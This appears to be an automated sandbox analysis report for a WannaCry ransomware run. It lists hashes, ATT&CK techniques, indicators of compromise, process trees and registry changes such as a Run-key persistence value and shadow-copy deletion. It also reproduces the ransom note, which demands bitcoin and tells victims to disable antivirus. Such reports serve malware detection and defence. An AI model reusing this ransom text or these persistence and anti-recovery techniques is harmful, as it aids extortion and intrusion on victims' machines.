wannacry | 41f5035bd0070cd9b240d684e1b055d9d76140ab53196cac1a6172b9490a3063

Resubmissions

01-02-2025 20:13

250201-yzt8razpaq 8

01-02-2025 18:19

250201-wymq6svjbs 10

Analysis

max time kernel
822s
max time network
829s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
01-02-2025 18:19

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

GoDm/.git/hooks/pre-receive.sample
Size

544B
MD5

2ad18ec82c20af7b5926ed9cea6aeedd
SHA1

705a17d259e7896f0082fe2e9f2c0c3b127be5ac
SHA256

a4c3d2b9c7bb3fd8d1441c31bd4ee71a595d66b44fcf49ddb310252320169989
SHA512

ee08c11fab7e896b2e09c241954ba7640338b12c75cd8040daf053c31b2f22236d7a0deac736f89d305236312fdb4f560a38d4d8debdcc9dcdd23b2d975907d5

Score

10^/10

wannacry aspackv2 defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Wannacry family
wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Disables Task Manager via registry modification
defense_evasion

Downloads MZ/PE file 5 IoCs

flow	pid	Process
98	1180	msedge.exe
98	1180	msedge.exe
98	1180	msedge.exe
98	1180	msedge.exe
98	1180	msedge.exe

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral10/files/0x0009000000023d97-441.dat	aspack_v212_v242

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD106B.tmp	WannaCry.EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD1082.tmp	WannaCry.EXE

Executes dropped EXE 52 IoCs

pid	Process
1296	WinNuke.98.exe
4464	WinNuke.98.exe
4828	Avoid.exe
3536	Avoid.exe
4244	Avoid.exe
1360	Avoid.exe
3140	Avoid.exe
3264	Avoid.exe
1780	Avoid.exe
2788	Avoid.exe
3612	WinNuke.98.exe
2720	WannaCry.EXE
1836	taskdl.exe
436	@[email protected]
1992	@[email protected]
3640	taskhsvc.exe
4920	taskdl.exe
1204	taskse.exe
2012	@[email protected]
2436	taskdl.exe
3624	taskse.exe
2432	@[email protected]
4832	taskdl.exe
4804	taskse.exe
3484	@[email protected]
2520	taskse.exe
2916	@[email protected]
3740	taskdl.exe
2652	@[email protected]
4752	@[email protected]
1788	taskse.exe
4844	@[email protected]
1912	taskdl.exe
2652	taskse.exe
4504	@[email protected]
5112	taskdl.exe
3712	taskse.exe
2628	@[email protected]
3332	taskdl.exe
4876	taskse.exe
4580	@[email protected]
4564	taskdl.exe
4792	taskse.exe
4084	@[email protected]
3804	taskdl.exe
1788	taskse.exe
1380	@[email protected]
3756	taskdl.exe
3288	000.exe
2000	taskse.exe
3660	@[email protected]
4224	taskdl.exe

Loads dropped DLL 7 IoCs

pid	Process
3640	taskhsvc.exe
3640	taskhsvc.exe
3640	taskhsvc.exe
3640	taskhsvc.exe
3640	taskhsvc.exe
3640	taskhsvc.exe
3640	taskhsvc.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3564	icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\cvzueddzb910 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\""	reg.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\L:	000.exe
File opened (read-only)	\??\R:	000.exe
File opened (read-only)	\??\S:	000.exe
File opened (read-only)	\??\X:	000.exe
File opened (read-only)	\??\G:	000.exe
File opened (read-only)	\??\N:	000.exe
File opened (read-only)	\??\V:	000.exe
File opened (read-only)	\??\W:	000.exe
File opened (read-only)	\??\Y:	000.exe
File opened (read-only)	\??\E:	000.exe
File opened (read-only)	\??\H:	000.exe
File opened (read-only)	\??\M:	000.exe
File opened (read-only)	\??\O:	000.exe
File opened (read-only)	\??\P:	000.exe
File opened (read-only)	\??\Q:	000.exe
File opened (read-only)	\??\T:	000.exe
File opened (read-only)	\??\U:	000.exe
File opened (read-only)	\??\A:	000.exe
File opened (read-only)	\??\B:	000.exe
File opened (read-only)	\??\I:	000.exe
File opened (read-only)	\??\J:	000.exe
File opened (read-only)	\??\K:	000.exe
File opened (read-only)	\??\Z:	000.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
97	raw.githubusercontent.com
98	raw.githubusercontent.com
105	camo.githubusercontent.com

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0"	000.exe

Sets desktop wallpaper using registry 2 TTPs 3 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	WannaCry.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000\Control Panel\Desktop\Wallpaper	000.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Avoid.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Avoid.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Avoid.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Avoid.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinNuke.98.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	000.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Avoid.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Avoid.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinNuke.98.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinNuke.98.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Avoid.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 2 IoCs

defense_evasion

pid	Process
2904	taskkill.exe
2372	taskkill.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4003209913-3868522715-854928974-1000\{F322B8EB-AA65-4F05-A954-2D03000E6189}	000.exe
Key created	\REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4003209913-3868522715-854928974-1000_Classes\Local Settings	OpenWith.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\icon.ico"	000.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2652	reg.exe

NTFS ADS 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 112683.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 449440.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 470995.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 802536.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 635384.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
1180	msedge.exe
1180	msedge.exe
1572	msedge.exe
1572	msedge.exe
3756	identity_helper.exe
3756	identity_helper.exe
2520	msedge.exe
2520	msedge.exe
2564	msedge.exe
2564	msedge.exe
2696	msedge.exe
2696	msedge.exe
2696	msedge.exe
2696	msedge.exe
4300	msedge.exe
4300	msedge.exe
3640	taskhsvc.exe
3640	taskhsvc.exe
3640	taskhsvc.exe
3640	taskhsvc.exe
3640	taskhsvc.exe
3640	taskhsvc.exe
4864	mspaint.exe
4864	mspaint.exe
2884	msedge.exe
2884	msedge.exe
5108	msedge.exe
5108	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
2012	@[email protected]
1572	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 24 IoCs

pid	Process
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1880	WMIC.exe
Token: SeSecurityPrivilege	1880	WMIC.exe
Token: SeTakeOwnershipPrivilege	1880	WMIC.exe
Token: SeLoadDriverPrivilege	1880	WMIC.exe
Token: SeSystemProfilePrivilege	1880	WMIC.exe
Token: SeSystemtimePrivilege	1880	WMIC.exe
Token: SeProfSingleProcessPrivilege	1880	WMIC.exe
Token: SeIncBasePriorityPrivilege	1880	WMIC.exe
Token: SeCreatePagefilePrivilege	1880	WMIC.exe
Token: SeBackupPrivilege	1880	WMIC.exe
Token: SeRestorePrivilege	1880	WMIC.exe
Token: SeShutdownPrivilege	1880	WMIC.exe
Token: SeDebugPrivilege	1880	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1880	WMIC.exe
Token: SeRemoteShutdownPrivilege	1880	WMIC.exe
Token: SeUndockPrivilege	1880	WMIC.exe
Token: SeManageVolumePrivilege	1880	WMIC.exe
Token: 33	1880	WMIC.exe
Token: 34	1880	WMIC.exe
Token: 35	1880	WMIC.exe
Token: 36	1880	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1880	WMIC.exe
Token: SeSecurityPrivilege	1880	WMIC.exe
Token: SeTakeOwnershipPrivilege	1880	WMIC.exe
Token: SeLoadDriverPrivilege	1880	WMIC.exe
Token: SeSystemProfilePrivilege	1880	WMIC.exe
Token: SeSystemtimePrivilege	1880	WMIC.exe
Token: SeProfSingleProcessPrivilege	1880	WMIC.exe
Token: SeIncBasePriorityPrivilege	1880	WMIC.exe
Token: SeCreatePagefilePrivilege	1880	WMIC.exe
Token: SeBackupPrivilege	1880	WMIC.exe
Token: SeRestorePrivilege	1880	WMIC.exe
Token: SeShutdownPrivilege	1880	WMIC.exe
Token: SeDebugPrivilege	1880	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1880	WMIC.exe
Token: SeRemoteShutdownPrivilege	1880	WMIC.exe
Token: SeUndockPrivilege	1880	WMIC.exe
Token: SeManageVolumePrivilege	1880	WMIC.exe
Token: 33	1880	WMIC.exe
Token: 34	1880	WMIC.exe
Token: 35	1880	WMIC.exe
Token: 36	1880	WMIC.exe
Token: SeBackupPrivilege	3952	vssvc.exe
Token: SeRestorePrivilege	3952	vssvc.exe
Token: SeAuditPrivilege	3952	vssvc.exe
Token: SeTcbPrivilege	1204	taskse.exe
Token: SeTcbPrivilege	1204	taskse.exe
Token: SeTcbPrivilege	3624	taskse.exe
Token: SeTcbPrivilege	3624	taskse.exe
Token: SeTcbPrivilege	4804	taskse.exe
Token: SeTcbPrivilege	4804	taskse.exe
Token: SeTcbPrivilege	2520	taskse.exe
Token: SeTcbPrivilege	2520	taskse.exe
Token: SeTcbPrivilege	1788	taskse.exe
Token: SeTcbPrivilege	1788	taskse.exe
Token: SeTcbPrivilege	2652	taskse.exe
Token: SeTcbPrivilege	2652	taskse.exe
Token: SeTcbPrivilege	3712	taskse.exe
Token: SeTcbPrivilege	3712	taskse.exe
Token: SeTcbPrivilege	4876	taskse.exe
Token: SeTcbPrivilege	4876	taskse.exe
Token: SeTcbPrivilege	4792	taskse.exe
Token: SeTcbPrivilege	4792	taskse.exe
Token: SeTcbPrivilege	1788	taskse.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
4828	Avoid.exe
3536	Avoid.exe
4244	Avoid.exe
1360	Avoid.exe
3140	Avoid.exe
3264	Avoid.exe
1780	Avoid.exe
2788	Avoid.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe

Suspicious use of SendNotifyMessage 40 IoCs

pid	Process
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe
1572	msedge.exe

Suspicious use of SetWindowsHookEx 28 IoCs

pid	Process
2520	OpenWith.exe
436	@[email protected]
436	@[email protected]
1992	@[email protected]
1992	@[email protected]
2012	@[email protected]
2012	@[email protected]
2432	@[email protected]
3484	@[email protected]
4864	mspaint.exe
4864	mspaint.exe
4864	mspaint.exe
4864	mspaint.exe
2916	@[email protected]
2652	@[email protected]
4752	@[email protected]
4456	OpenWith.exe
692	OpenWith.exe
4844	@[email protected]
4504	@[email protected]
2628	@[email protected]
4580	@[email protected]
1572	msedge.exe
4084	@[email protected]
1380	@[email protected]
3288	000.exe
3288	000.exe
3660	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1572 wrote to memory of 3584	1572	msedge.exe	98
PID 1572 wrote to memory of 3584	1572	msedge.exe	98
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 2332	1572	msedge.exe	99
PID 1572 wrote to memory of 1180	1572	msedge.exe	100
PID 1572 wrote to memory of 1180	1572	msedge.exe	100
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101
PID 1572 wrote to memory of 2688	1572	msedge.exe	101

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2312	attrib.exe
4152	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\GoDm\.git\hooks\pre-receive.sample
1⤵
- Modifies registry class
PID:1304

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff076346f8,0x7fff07634708,0x7fff07634718
  2⤵
  PID:3584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
